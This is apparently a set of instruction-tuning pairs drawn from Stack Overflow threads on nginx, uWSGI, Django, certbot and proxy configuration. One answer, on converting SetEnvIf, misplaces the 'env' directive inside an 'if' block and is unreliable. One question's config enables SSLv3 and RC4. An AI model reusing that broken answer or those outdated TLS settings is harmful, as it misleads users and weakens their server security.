Response | Instruction | Prompt |
---|---|---|
Use the "=" modifier to process an exact match on "/":
location = / {
proxy_pass http://127.0.0.1:8000;
}
location / {
expires -1;
alias /var/static-site/;
} | I want to have an nginx rule that will proxy requests with an empty path / to a back-end server, and another rule that matches non-empty paths, e.g. http://mysite/x/y/z. The following two rules do not do this; the second one is catching all:
# empty path
location ^/?$ {
proxy_pass http://127.0.0.1:8000;
}
location / {
expires -1;
alias /var/static-site/;
}
I have tried /.*/ for the second rule, without success... | How to write nginx rules/regexes to match empty and non-empty paths |
I spent a lot of time researching this a while back, and the best solution seemed to be using Lua. It's a bit of a pain: I had to compile NGINX with Lua; I used OpenResty. My use case required masking sensitive data posted through my NGINX reverse proxy. However, it's definitely different from yours in that you're using proxy_method to make the additional POST, so I'm not 100% sure it will solve your problem. Still, I think it's worth checking out. Here is a small code snippet from my config if it helps. Glad to go into more detail if you need.
location /login {
set $request_body_mask "";
# mask client_secret in posts
access_by_lua '
local req = ngx.req.get_body_data()
ngx.var.request_body_mask = ngx.re.gsub(req, "(client_secret=).{8}", "$1********")
';
# mask client_secret in gets
set_by_lua $request_mask '
local req = ngx.var.request_uri
return ngx.re.gsub(req, "(client_secret=).{8}", "$1********")
'; | I'm trying to use NGINX to proxy a request that needs to do a bit of magic in the middle. Essentially I have a client that can only send an unauthenticated GET request, and I need to receive this request, make a POST that will log in to a server using static credentials stored in the NGINX config, and replace the response body with an HTML redirect. This will work for my scenario because the POST response will contain a Set-Cookie header with a session id representing the authenticated session. I know I can use proxy_method to force NGINX to make the outbound call via POST, and I can use sub_filter to replace the POST response with the HTML redirect. My question is: how can I set a request body that will get sent in the POST request? Any ideas? Ian | Replace request body in NGINX proxy for POST |
As Heroku DevCenter claims, Unicorn workers are vulnerable to slow clients. Each worker is only able to process a single request, and if the client is not ready to accept the entire answer (aka a "slow client"), the Unicorn worker is blocked on sending out the response and cannot handle the next one. Since each Unicorn worker takes up a substantial amount of RAM (again, see Heroku; it claims to handle 2-4 processes at 512 MiB RAM), you cannot rely on the number of workers, since it's about the number of clients that can render your application inoperable by pretending to have slow connections. When behind nginx, Unicorn is able to dump the entire answer into nginx's buffer and switch immediately to handling the next request. That said, nginx with a single Unicorn worker behind it is much more reliable than a bunch of Unicorn workers exposed directly. NB: for the folks using ancient Rubies out there: if you'll be using a set of Unicorn workers, consider migrating to at least Ruby 2.0 to reduce RAM consumption by sharing common data across forked processes (ref). | I read that unicorn is fast at serving static content, slow users, and making redirects. Why is nginx+unicorn better than running unicorn only and scaling the number of unicorn workers when needed? Do you have any numbers showing how much faster nginx is at each of these things (redirecting, proxying, serving static content)? | Is it bad to use unicorn without nginx? Why? |
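The buffering behaviour that answer relies on can be sketched as a minimal nginx front end for a Unicorn socket. This is an illustrative config, not taken from the answer; the socket path and upstream name are assumptions:

```nginx
upstream unicorn_app {
    # one Unicorn worker on a local Unix socket
    server unix:/tmp/unicorn.sock fail_timeout=0;
}

server {
    listen 80;

    location / {
        # nginx reads the whole upstream response into its buffers,
        # so the Unicorn worker is freed even if the client is slow
        proxy_buffering on;
        proxy_set_header Host $host;
        proxy_pass http://unicorn_app;
    }
}
```

Note that proxy_buffering is on by default; it is spelled out here only to highlight the mechanism the answer describes.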
Well ... I found a related question here, and I added proxy_buffering off; to the config file, and this solved the problem for my case. The file is as follows:
server {
listen 80;
server_name myapp.com;
access_log /var/log/nginx/myapp_access.log;
error_log /var/log/nginx/myapp_error.log;
location / {
client_max_body_size 400M;
proxy_read_timeout 120;
proxy_connect_timeout 120;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Client-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8888;
proxy_buffering off;
}
} | I request some JSON data by some URL; sometimes it works fine and sometimes it doesn't ... I looked at another related question here, but it seems to recommend not changing Content-Length in middleware ... my incomplete JSON data is as the image below shows. My app's nginx config:
server {
listen 80;
server_name myapp.com;
access_log /var/log/nginx/myapp_access.log;
error_log /var/log/nginx/myapp_error.log;
location / {
client_max_body_size 400M;
proxy_read_timeout 120;
proxy_connect_timeout 120;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Client-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8888;
}
}
gunicorn script:
#!/bin/bash
set -e
DJANGODIR=/home/ubuntu/apps/myapp
LOGFILE=/var/log/gunicorn/myapp.log
LOGDIR=$(dirname $LOGFILE)
NUM_WORKERS=3
# user/group to run as
USER=ubuntu
GROUP=ubuntu
cd /home/ubuntu/apps/myapp
source /home/ubuntu/.venv/myapp/bin/activate
export PYTHONPATH=$DJANGODIR:$PYTHONPATH
export NEW_RELIC_CONFIG_FILE=/home/ubuntu/newrelic/newrelic.ini
test -d $LOGDIR || mkdir -p $LOGDIR
exec /usr/local/bin/newrelic-admin run-program /home/ubuntu/.venv/myapp/bin/gunicorn_django -w $NUM_WORKERS \
--user=$USER --group=$GROUP --log-level=debug \
--log-file=$LOGFILE -b 127.0.0.1:8888 2>>$LOGFILE | nginx + gunicorn throws truncated response body |
Just create a new settings file which includes the original settings and defines a special ROOT_URLCONF setting. Now you simply need to deploy your app with that DJANGO_SETTINGS_MODULE on that admin subdomain. E.g.:
settings_admin.py
from settings import *
ROOT_URLCONF = 'urls_admin'
urls_admin.py
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'', include(admin.site.urls)),
) | I have a project running Django, uWSGI, and Nginx. Currently I use the default Django admin site, served at example.com/admin. I want to change this so that the admin site is only available at admin.example.com. What is the best way to do this? I had thought about starting a completely new Django project to be served on admin.example.com but with the same database settings as the project that runs example.com, but I'm hoping for something more elegant, since this would involve duplicating a lot of the settings and apps between the projects. Basically the only difference between the two would be that one would have the admin site and URL pattern installed and one would not. (My reason for this is eventually wanting to use something like google auth proxy to protect the admin site but have non-admin logins go through the normal authentication backend. It looks like I could do this by specifying that Django use HTTP Basic Auth for admin.example.com, but stick with the default backend for example.com.) | Serving Django admin site on subdomain |
As mpcabd mentioned, Stripe webhooks will not follow redirects for security reasons. As he also mentioned, while you can filter by IP, it's a never-ending battle (and Stripe has previously stated they intend to eventually stop publishing an IP list). The even easier, set-it-and-forget-it solution: in the Stripe dashboard, reconfigure your webhooks to use HTTPS. Bam. Done. | I recently modified my nginx server to redirect all www.mysite requests to https://mysite. The problem is that when I did that, the Stripe webhook I had set up started failing with a 301 redirect error. How do I alter my nginx server so that only requests coming from my domain are redirected? (Or at least I think that's the solution; I'm a front-end guy.) Here's my server:
server {
listen 443;
server_name mysite.com;
root /var/www/mysite.com/app/mysite;
ssl on;
ssl_certificate /etc/nginx/ssl/cert.crt;
ssl_certificate_key /etc/nginx/ssl/mykey.key;
#enables SSLv3/TLSv1, but not SSLv2 which is weak and should no longer be used.
ssl_protocols SSLv3 TLSv1;
#Disables all weak ciphers
ssl_ciphers ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM;
location / {
proxy_pass http://127.0.0.1:3000/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
server {
listen 80;
server_name www.mysite.com;
return 301 https://mysite.com$request_uri;
} | Redirecting Requests to https breaks Stripe webhook |
Ok, so the error was totally unrelated to nginx. Turns out curl has no engine for running SSL by default on OS X. Therefore, curl never sent any certificate to the server. | I am using nginx for my web server with client certificate authentication. The relevant part of the config is:
ssl_certificate /usr/local/etc/nginx/certs/ssl.crt;
ssl_certificate_key /usr/local/etc/nginx/certs/ssl.key;
ssl_client_certificate /usr/local/etc/nginx/certs/server_chain.crt;
ssl_verify_client on;
ssl_verify_depth 2;
The client certificates are signed by another server that has a certificate from a root CA. I.e., I want to accept clients that have a certificate chain as follows: CA -> intermediate CA -> client. Therefore the file server_chain.crt is made by:
cat intermediate_ca.crt root_ca.crt > server_chain.crt
Now, I can successfully access the server by issuing the command:
openssl s_client -connect localhost:443 -tls1 -cert client.crt \
-key client.key -CApath root_ca.crt -state -debug`and then typingGET /apiBut if I try to reach the same service by using:curl -v -s -k --key client.key --cert client.crt https://localhost/apiI get:
400 No required SSL certificate was sent
400 Bad Request
No required SSL certificate was sent
nginx/1.6.0
I also cannot access the localhost/api page from a web browser with a client certificate installed, something that works if I turn off client verification. Any ideas on what's wrong? | Access server with client certificate using s_client but not curl? |
I found what the issue was. My custom headers were API_USER and API_TOKEN.
There is a directive in Nginx that says to ignore headers with a '_' in the name (more info here). So I've updated my custom headers to x-api-user and x-api-token and now it's working like a charm! | I'm working with Apache on my local instance and nginx in production. I have a JavaScript application that sets headers in API calls to authenticate the user. It's working fine locally with my Apache server. However, for some reason my custom headers are ignored by Nginx. I tried to add this line in my site configuration:
add_header 'Access-Control-Allow-Origin' '*';
But it still ignores the headers.
Does anyone know where I should look to bypass this? Cheers,
Maxime | Nginx is ignoring my headers |
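For completeness, nginx also has a directive that accepts such headers instead of dropping them; renaming the headers (as in the answer above) avoids relying on it, but a hedged sketch of the alternative looks like this, with the server_name being a placeholder:

```nginx
server {
    listen 80;
    server_name example.com;

    # accept request headers containing underscores (e.g. API_USER,
    # API_TOKEN) instead of silently ignoring them
    underscores_in_headers on;
}
```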
You misunderstand how internal and X-Accel-Redirect work. The main idea is that you go to some URL which is proxied to the app. Then the app decides whether you should get access to the file or not. In the former case it responds with X-Accel-Redirect to the protected URL (the one with internal). So you should go to some other URL, e.g. http://localhost:4000/get/files/test.jpg, and your application could look like this:
var http = require('http');
http.createServer(function (req, res) {
if (req.url.indexOf('/get/files/') == 0) {
if (userHasRightToAccess()) {
            res.setHeader('X-Accel-Redirect', req.url.slice(4));
res.end('');
} else {
// return some error
}
} else {
console.log(req.url);
res.end('works');
}
}).listen(3000); | I'm trying to set up authorized file access on nginx backed by node.js. For some reason all the examples don't work for me. I'm trying to serve files from /data/private/files. My nginx configuration:
...
server {
listen 4000;
server_name localhost;
location / {
proxy_pass http://127.0.0.1:3000/;
}
location /files {
root /data/private;
internal;
}
My node server.js:
var http = require('http');
http.createServer(function (req, res) {
console.log(req.url);
res.end('works');
}).listen(3000);
When I request http://localhost:4000/xyz, the request is correctly being passed on to node. When I request http://localhost:4000/files/test.jpg, I just get a 404 and nothing gets passed to node. What am I doing wrong? When I comment out internal, test.jpg gets served correctly by nginx directly, so I assume the paths are correct. I'm pretty sure I had this working at some point before, but on a different server, maybe with a different node and nginx version. Tried it with nginx 1.6.0 and 1.2.6, node v0.10.21. I've also added all the proxy_set_header and proxy_pass options that you find in all the examples; nothing works. I'm running this in a Vagrant-based Ubuntu VM right now, but it doesn't work on Mac either. I know that I have to set the header through res.setHeader("X-Accel-Redirect", req.url);, but that's not the issue here, as I don't even get to the phase where I could set the required header in node. | Nginx X-Accel-Redirect not working with node.js |
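The prefix-stripping step the answer performs with JavaScript's `url.slice(4)` can be illustrated in Python; the `/get` prefix and `/files` location are the ones used above, while the helper itself is just an illustration:

```python
def to_internal_path(public_url):
    """Map a public /get/files/... URL to the internal /files location,
    mirroring the answer's req.url.slice(4)."""
    prefix = "/get"
    if not public_url.startswith(prefix + "/files/"):
        raise ValueError("not a protected-file URL: " + public_url)
    # dropping "/get" keeps the leading slash of "/files/..."
    return public_url[len(prefix):]

print(to_internal_path("/get/files/test.jpg"))  # -> /files/test.jpg
```

The value returned is exactly what goes into the X-Accel-Redirect header, which nginx then resolves against the internal location.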
Is /var/ngx_pagespeed_cache your caching folder? If so, this should work. As Dayo noted, we do not delete the files, just invalidate them. However, you can also just rm -r the caching folder and then reload Nginx (to clear the in-memory cache). If you are using memcached, you'd have to clear that too. | I have Google's PageSpeed installed with nginx, set up following here. I need to flush/delete the previously cached content but could not find a solution. On the PageSpeed site it's mentioned to use this command:
touch /var/ngx_pagespeed_cache/cache.flush
But I have no success with it. Thanks for any help. | Google PageSpeed not updating cache |
Use the below in your config.ru instead:
require "./app"
run Sinatra::Application
It is a path issue. | Just deployed a Ruby app using Capistrano. I'm pretty sure I did everything as usual. Passenger though outputs the following:
cannot load such file -- app.rb (LoadError)
config.ru:1:in `require'
config.ru:1:in `block in '
/home/deploy/apps/blog/shared/bundle/ruby/2.0.0/gems/rack-1.5.2/lib/rack/builder.rb:55:in `instance_eval'
/home/deploy/apps/blog/shared/bundle/ruby/2.0.0/gems/rack-1.5.2/lib/rack/builder.rb:55:in `initialize'
config.ru:1:in `new'
config.ru:1:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:108:in `eval'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:108:in `preload_app'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:153:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:29:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:28:in `'
**Application root**
/home/deploy/apps/blog/current
The app.rb actually is in this directory. | cannot load such file -- app.rb (LoadError)
Assuming no Suhosin... then see max_input_vars and max_input_nesting_level. These are newer and often overlooked when people think of POST limits in PHP. But if it's truncated like you say, then maybe it is just your post_max_size. Also, this just has to be a dupe question... see "PHP max_input_vars", "Increasing the maximum post size", etc. | The Background: I am using CodeIgniter 2.1.4 and PHP 5.3 running on Nginx. I have an HTML form representing what is essentially rows of homogeneous data. Each "row" has several fields, each with the same name. Here's a simplified example:
So, I've got many firstname[] inputs, lastname[] inputs, etc. After submitting the form (the action is POST), I retrieve the data in a controller method like so (note that I'm using CodeIgniter):
$firstnames = $this->input->post('firstnames');
$lastnames = $this->input->post('lastnames');
These variables are arrays containing the values from the corresponding rows in the form, and from here I do some processing on this data. The Problem: When the number of rows in the form is large (several hundred), the sizes of the resulting PHP arrays do not match the number of inputs in the form -- for example, the form might have 200 firstname inputs, but the $firstnames array only has 167. What's more, the $lastnames variable has a different size as well -- 166. When the form has a smaller number of elements, everything works fine. My theory is that I am exceeding some sort of maximum size setting or buffer somewhere in the stack, causing the form data to be truncated. Is there a PHP or CodeIgniter or nginx setting for "maximum form size" that I am not aware of? For what it's worth, I have seen the same behavior when using both application/x-www-form-urlencoded and multipart/form-data as the content type for the form. What am I missing? | Truncated/missing form data when form contains large number of inputs? |
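The lopsided array sizes are consistent with PHP's max_input_vars cap, which silently drops everything after the limit. A hypothetical simulation (the six-fields-per-row shape and the default limit of 1000 are assumptions, not taken from the question) shows how the per-field counts diverge when the cap lands mid-row:

```python
# Simulate PHP stopping after max_input_vars POST values.
MAX_INPUT_VARS = 1000   # PHP's default
ROWS, FIELDS = 200, 6   # assumed form shape

# Inputs arrive in document order: row 0 field 0, row 0 field 1, ...
inputs = [(field, row) for row in range(ROWS) for field in range(FIELDS)]
parsed = inputs[:MAX_INPUT_VARS]  # everything past the cap is dropped

counts = [sum(1 for f, _ in parsed if f == field) for field in range(FIELDS)]
print(counts)  # -> [167, 167, 167, 167, 166, 166]
```

Raising max_input_vars in php.ini removes the truncation; the point here is only that the cap cuts a row in half, so sibling arrays end up with unequal lengths, much like the 167 vs 166 counts reported.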
I don't think you can match the args by regex; try this instead:
location /api/v0/roslyn {
resolver 8.8.8.8;
proxy_pass $scheme://my-windows-box.com/roslyn$is_args$query_string;
} | I'm trying to proxy a certain REST endpoint on my Linux API box to my Windows box. Here's what I have right now. My Linux API box:
...
location ~ ^/api/v0/roslyn(.*)$ {
resolver 8.8.8.8;
proxy_pass $scheme://my-windows-box.com/roslyn$1;
}
For example, I'd like to proxy the following URL http://my-linux-box.com/api/v0/roslyn?q=5 to http://my-windows-box.com/roslyn?q=5. However, it seems to be missing the query string, so the regex is failing? | Nginx proxy_pass having problems with querystring for an API |
You're talking about the option connect_timeout?
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='', db='mysql', connect_timeout=20)
In DAL terms this option will be something like this (not tested):
db = DAL('mysql://username:password@localhost/test', driver_args={'connect_timeout': 20})
| We have a Python application running with uWSGI and nginx. We have a fallback mechanism for DBs, i.e., if one server refuses to connect, we connect to the other server. But the issue is that the connection takes more than 60s to time out. As nginx times out in 60s, it displays the nginx error page. Where can we change the timeout for connecting to the MySQL servers so that we can make three connection attempts within the 60s nginx timeout period? We use Web2py and the default DAL object with the pymysql adapter. | How to decrease the timeout for my python application connecting to mysql server |
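The "three attempts inside nginx's 60 s window" requirement from the question amounts to a short per-host connect timeout plus a failover loop. A sketch with stand-in connector callables; the real code would pass pymysql.connect with connect_timeout as the answer shows, and the host roles here are illustrative:

```python
def connect_with_failover(connectors, per_host_timeout=20):
    """Try each connect callable in turn; return the first that succeeds.

    With per_host_timeout=20, three attempts fit inside a 60 s window.
    """
    last_error = None
    for connect in connectors:
        try:
            return connect(timeout=per_host_timeout)
        except OSError as exc:  # covers refused connections and timeouts
            last_error = exc
    raise last_error

# Stand-ins for pymysql.connect calls against a primary and a fallback host:
def primary(timeout):
    raise OSError("primary unreachable")

def fallback(timeout):
    return "connection-to-fallback"

print(connect_with_failover([primary, fallback]))  # -> connection-to-fallback
```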
I had the exact same problem. The problem is related to EOL (end-of-line) handling of certain files with the Perl build used.
You should not use the MSYS Perl build.
Instead you should use ActivePerl or Strawberry Perl, as indicated in the guide.
Be sure though that the PATH points to the appropriate Perl distribution, prior to the MSYS Perl:
export PATH=/appropriate/perl/dist:$PATH
This answer helped me solve the problem. | I have Windows 7 Pro x86 with Visual Studio 2010 Pro. Also I have MinGW in c:\MinGW.
I want to build nginx under Windows using Visual C++. I follow this guide. I run cmd as Administrator, then I call "c:\Program Files\Microsoft Visual Studio 10.0\VC\vcvarsall.bat". In cmd I run C:\MinGW\msys\1.0\msys.bat. I cd to the nginx source directory and run the configure script, having downloaded the prerequisites beforehand. Then I run nmake -f objs/Makefile. The result is the following error:
Copyright (C) Microsoft Corporation. All rights reserved.
'install' is up-to-date
cl -O2 -W4 -WX -nologo -MT -Zi -DFD_SETSIZE=1024 -DNO_SYS_TYPES_H
-Ycngx_config.h -Fpobjs/ngx_config.pch -c -I src/core -I src/event
-I src/event/modules -I src/os/win32 -I objs/lib/pcre-8.32
-I objs/lib/openssl/openssl/include -I objs/lib/zlib-1.2.7 -I objs
-I src/http -I src/http/modules -I src/mail -Foobjs/ngx_pch.obj
objs/ngx_pch.c ngx_pch.c
cl -c -O2 -W4 -WX -nologo -MT -Zi -DFD_SETSIZE=1024 -DNO_SYS_TYPES_H
-Yungx_config.h -Fpobjs/ngx_config.pch -I src/core -I src/event
-I src/event/modules -I src/os/win32 -I objs/lib/pcre-8.32
-I objs/lib/openssl/openssl/include -I objs/lib/zlib-1.2.7 -I objs
-I src/http -I src/http/modules -I src/mail -Foobjs/src/core/nginx.obj
src/core/nginx.c nginx.c
c:\nginx\source\src\event\ngx_event_openssl.h(15) : fatal error C1083:
Cannot open include file: 'openssl/ssl.h': No such file or directory
NMAKE : fatal error U1077: '"c:\Program Files\Microsoft Visual Studio
10.0\VC\BIN\cl.EXE"' : return code '0x2' Stop.
But OpenSSL is located in C:\nginx\source\objs\lib\openssl. What did I do wrong? | Building nginx in Windows 7 with MSYS |
If you want to indicate that a web browser should download a resource rather than display it, try using the Content-Disposition header as described in RFC 6266. For example, the following response header will tell the browser to download the file:
Content-Disposition: attachment
You can also specify a file name for the downloaded file through this header (if it differs from the last path component in the URL):
Content-Disposition: attachment; filename=foo.pdf
Looking at the Nginx documentation, this response header should work correctly in conjunction with the X-Accel-Redirect feature you're using. | I want a user to be able to click a link like this: download. Have a Pyramid 1.2.7 app handle the view like this:
@view_config(route_name='download')
def download(request):
file_id = request.GET['file']
filename = get_filename(file_id)
headers = request.response.headers
headers['Content-Description'] = 'File Transfer'
headers['Content-Type'] = 'application/force-download'
headers['Accept-Ranges'] = 'bytes'
headers['X-Accel-Redirect'] = ("/path/" + filename + ".pdf")
    return request.response
And my nginx configuration looks like this:
location /path/ {
internal;
root /opt/tmp;
} | This all works, but instead of the browser showing a PDF as a download, the browser displays a bunch of PDF garbage. How do I set up my Pyramid view to get the browser to do the right thing? | Serve up pdf as a download with Pyramid, nginx, X-Accel-Redirect header |
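The header values the answer recommends can be built with a tiny helper; this is an illustration, not part of the Pyramid app above:

```python
def content_disposition(filename=None):
    """Build a Content-Disposition value per the RFC 6266 examples above."""
    if filename is None:
        return "attachment"
    # quoting keeps filenames with spaces intact
    return 'attachment; filename="{0}"'.format(filename)

print(content_disposition())           # -> attachment
print(content_disposition("foo.pdf"))  # -> attachment; filename="foo.pdf"
```

In the view above, the result would be assigned to headers['Content-Disposition'] alongside the X-Accel-Redirect header.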
You can do it like this:
if ($host = albany.mywebsite.com) {
env MAGE_RUN_CODE=w2769;
env MAGE_RUN_TYPE=website;
(and so on for the other host values); see http://nginx.org/en/docs/ngx_core_module.html#env | I have the below .htaccess settings along with my Apache website; now I am moving this to Nginx. Thus I wonder how I can convert the below 'SetEnvIf' parameters from the .htaccess file to the Nginx configuration? I think it's done by setting up 'fastcgi_param'; please help me do the conversion.
SetEnvIf HOST albany\.mywebsite\.com MAGE_RUN_TYPE=website
SetEnvIf HOST alexandria\.mywebsite\.com MAGE_RUN_CODE=w1472
SetEnvIf HOST alexandria\.mywebsite\.com MAGE_RUN_TYPE=website
SetEnvIf HOST annarbor\.mywebsite\.com MAGE_RUN_CODE=w2933
SetEnvIf HOST annarbor\.mywebsite\.com MAGE_RUN_TYPE=website
Thank you. | .htaccess-SetEnvIf to Nginx-fastcgi_param conversion |
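If per-host `if` blocks get unwieldy, nginx's `map` directive is the usual way to derive such values from `$host` and hand them to PHP via `fastcgi_param`, which is what the question asked about. A hedged sketch using the store codes from the question; the placement comments mark the standard http/location split:

```nginx
# in the http {} context
map $host $mage_run_code {
    albany.mywebsite.com      w2760;
    alexandria.mywebsite.com  w1472;
    annarbor.mywebsite.com    w2933;
}

# inside the PHP-handling location block
fastcgi_param MAGE_RUN_CODE $mage_run_code;
fastcgi_param MAGE_RUN_TYPE website;
```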
It's already been a few years since the Nginx API changed for this directive; it should be:
gzip_disable "msie6";
A full-stack Nginx+Unicorn optimized configuration can be found in the gist. | My nginx configuration file is inspired by defunkt's conf file for unicorn, but it seems that the line gzip_disable "MSIE [1-6]\."; makes everything crash. I get the error that the site is temporarily unavailable (served from nginx/html/50x.html). Commenting out the line makes everything work again; fiddling with the regexp doesn't change a thing. I'm running nginx v1.0.10 and Ubuntu 11.10. Any idea? | Why does gzip_disable make nginx crash? |
You have to involve some scripting to make it work. The most you can get with nginx configuration is a custom footer and header. By the way, the developers look forward to adding an XML index module to nginx. | I'm trying to share folder contents over HTTP. I've installed nginx with autoindex on and configured it for my folder. The problem is it gives me an HTML file with the file/folder list, but I want some kind of XML with the same information. Is it possible to do this using standard nginx tools, or should I implement some script to solve this problem? | Change nginx autoindex output format |
This is the more logical answer: http://projects.unbit.it/uwsgi/wiki#Wherearethebenchmarks
The listen queue size is reported in the uWSGI startup logs. But as you have not posted your uWSGI config, it is impossible to give you the right hint. | httperf ... --rate=20 --send-buffer=4096 --recv-buffer=16384 --num-conns=100 --num-calls=10
gives 1000 requests as expected on nginx.
Connection rate: 17.5 conn/s (57.2 ms/conn, <=24 concurrent connections)
Connection time [ms]: min 699.0 avg 861.3 max 1157.5 median 840.5 stddev 119.5
Connection time [ms]: connect 56.9
Connection length [replies/conn]: 10.000
Request rate: 174.8 req/s (5.7 ms/req)
Request size [B]: 67.0
Reply rate [replies/s]: min 182.0 avg 182.0 max 182.0 stddev 0.0 (1 samples)
Reply time [ms]: response 80.4 transfer 0.0
Reply size [B]: header 284.0 content 177.0 footer 0.0 (total 461.0)
Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0
CPU time [s]: user 1.42 system 4.30 (user 24.9% system 75.1% total 100.0%)
Net I/O: 90.2 KB/s (0.7*10^6 bps)
Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0
On the same hardware, querying uWSGI on port 8000 results in 200 requests and 100 replies, and 100 reset connections. What's wrong? The server is extremely powerful.
Total: connections 100 requests 200 replies 100 test-duration 5.111 s
Connection rate: 19.6 conn/s (51.1 ms/conn, <=5 concurrent connections)
Connection time [ms]: min 69.5 avg 128.4 max 226.8 median 126.5 stddev 27.9
Connection time [ms]: connect 51.4
Connection length [replies/conn]: 1.000
Request rate: 39.1 req/s (25.6 ms/req)
Request size [B]: 67.0
Reply rate [replies/s]: min 19.8 avg 19.8 max 19.8 stddev 0.0 (1 samples)
Reply time [ms]: response 68.8 transfer 8.2
Reply size [B]: header 44.0 content 2053.0 footer 0.0 (total 2097.0)
Reply status: 1xx=0 2xx=100 3xx=0 4xx=0 5xx=0
CPU time [s]: user 1.87 system 3.24 (user 36.6% system 63.4% total 100.0%)
Net I/O: 42.6 KB/s (0.3*10^6 bps)
Errors: total 100 client-timo 0 socket-timo 0 connrefused 0 connreset 100
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0 | Stuck at 100 requests uWSGI |
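A likely culprit for the 100 resets is the listen queue the answer points to: uWSGI's backlog defaults to 100, the same number of connections httperf opens. Raising it is a one-line change; the ini below is an illustrative sketch, not the poster's actual config:

```ini
[uwsgi]
socket = 127.0.0.1:8000
processes = 4
; raise the listen queue from the default of 100;
; values above net.core.somaxconn also require a sysctl change
listen = 1024
```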
I created a script to do this two years ago, called ruby-cgi, in response to a similar question. I believe it does exactly what you want. Just set it up the same way you would set up other CGI/FastCGI handlers. | Is there a way to simply send an erb file to a Ruby parser, get the answer back, and send it to the client with NGINX? Without all the Passenger stuff? It should be easy, I guess. I DON'T want to use any Rails stuff; don't tell me I should use Rails, etc. | Is there a simple way to use erb files directly like PHP files with NGINX? |
You can't set cookies via an esi:include because ESIs are requested by Varnish and not by the client. What you can do is include a JavaScript tag or tracking pixel via ESI and then set your cookies that way. Or you could reverse what you're doing: make your main webserver request set cookies and do your user stuff, then include an ESI to get the content which doesn't need cookies. | I'm trying to use ESI to do some ninja caching on my site.
The idea is that the site is mostly static; I just need to do fancy stuff depending on whether the user is logged in or not.
So I was trying to put an esi:include on page A, and set triggers in the application at page B. This way I could cache page A on Varnish, and let the server deal with the small piece of work that is page B. But the cookies I set on page B were not forwarded to the headers of page A, and it didn't work =/ Is this that I'm trying to do possible? I could use AJAX, but doing this inside the server, before sending the page to the user, seems more correct to me. P.S.: I can't create an esi tag =/
That should be alias /var/www/fileUpload/html; otherwise Nginx looks for the file in /var/www/fileUpload/html/upload/index.html. See this document for details. For example:
location /upload {
alias /var/www/fileUpload/html;
} | I want to call the index.html from the folder /var/www/fileUpload/html. The index.html file exists in that folder. The / route works, the uploadFiles route as well. But when I open the upload route I get a 404 error.
listen 80;
server_name xx.xx.xxx.xxx;
location / {
root /var/www/kioskJPE/html;
index index.html;
}
location /upload {
root /var/www/fileUpload/html;
index index.html;
}
location /uploadFiles {
proxy_pass http://localhost:8080;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}Do you have any suggestions?
Thank you! | NGINX 404 not found but file exists |
Your domain registrar has pre-configured an AAAA record for your domain. Remove the AAAA record from your DNS settings. In your case, remove the "www.mydomain.nl AAAA 2a02:2268:ffff:ffff::4" record. | I have an issue with applying Let's Encrypt SSL certificates to my domains using nginx and certbot. My (Nuxt.js) website is running on a VPS with Ubuntu 18.04. I want to add the certificates to mydomain.nl and staging.mydomain.nl but am unable to. I am quite new to this, but I did manage to do this before without any problems. If I am correct, certbot tries to place a file to validate the domain when running sudo certbot --nginx. But then I get the following error:
Failed authorization procedure. mydomain.nl (http-01): urn:ietf:params:acme:error:unauthorized :: The client lacks sufficient authorization :: Invalid response from http://mydomain.nl/.well-known/acme-challenge/PBjT0nQy7m5_bE42I1jr5mMaYxLMma4ONP9FAUgCD3c [2a02:2268:ffff:ffff::4]: "\n\n404 Not Found\n\nNot Found\n\n\n404 Not
Found\n\nNot Found\n<p"
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address.
I have tried adding this block in the config as well:
allow all;
root /var/www/mydomain.nl/html;
}
But no success. I can visit my websites on my domains, so the DNS should be correct. | Unable to add Let's Encrypt SSL certificate to domains using nginx (certbot) |
I personally had to get the header value manually. It was due to the cloud setting. Maybe this will help you:
if (Request.Headers.TryGetValue("X-Forwarded-For", out var forwardedIps))
senderIpv4 = forwardedIps.First(); | My environment:
Ubuntu 18.04, ASP.NET Core 2.1, Nginx. I followed this tutorial.
I added this code in Startup.cs:
app.UseForwardedHeaders(new ForwardedHeadersOptions
{
ForwardedHeaders = ForwardedHeaders.XForwardedFor | ForwardedHeaders.XForwardedProto
});
I configured my Nginx like this:
listen *:443 ssl http2;
location / {
proxy_pass https://localhost:6001;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-Proto-Version $http2;
client_max_body_size 32m;
keepalive_timeout 200;
send_timeout 20;
client_body_timeout 50;
proxy_set_header X-Forwarded-For $remote_addr;
}
I get the remote IP by:
var ip = HttpContext.Connection.RemoteIpAddress?.ToString();
but it always returns 127.0.0.1 for any IP. | Asp.net Core get remote IP of client always returns 127.0.0.1 |
